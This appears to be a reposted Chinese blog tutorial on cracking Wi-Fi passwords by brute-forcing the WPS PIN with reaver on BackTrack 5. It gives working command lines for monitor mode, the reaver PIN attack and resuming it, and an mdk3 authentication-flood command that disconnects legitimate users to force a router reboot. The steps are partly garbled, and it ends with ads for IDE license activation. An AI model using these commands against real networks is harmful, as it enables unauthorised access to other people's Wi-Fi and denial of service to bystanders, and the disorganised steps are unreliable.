大家好,又见面了,我是你们的朋友全栈君。
精解reaver用BT5成功PIN解码
(2012-09-20 14:06:23)
提醒:只限于个人测试使用,由于非法操作引起的相关法律责任与本作者无关。
reaver使用方法、步骤:
1、打开超级终端 ROOt shell
2、如果电脑装有多个无线网卡,请先发指令
ifconfig -a
4、
确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡
WLAN0为例
一、激活监听模式:
airodump-ng
四、 抓PIN码:
reaver -i mon0 -b MAC
例如:
特别提示:
只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用指令:
airodump-ng
MB一栏下,出现
54e. (看清楚有点“.”) 是开WPS的
AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
PIN破密对信号要求极为严格,
如果信号稍差,可能导致破密进度变慢或者路由死锁等
(重复同一个PIN码 或
timeout),特别是1、6默认频道中,有较多的AP,相互干扰,因此,确定网卡放置的最佳位置、方向、角度十分重要。
破解过程中 ,重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止,reaver会自动保存进度。
重复第2-4项内容,先看看AP信号强弱或是否关机,
若继续破,则再次在终端中发送:
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头,胜利往往在 再坚持一下的努力之中。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
ifconfig -a
然后模拟端口:
airmon-ng start wlan0
接下来用:
airodump-ng mon0
mdk3 mon0 a -a mac(被pin死的路由器的mac)
身份验证攻击效果说明:
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。
说明:
此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/143011.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...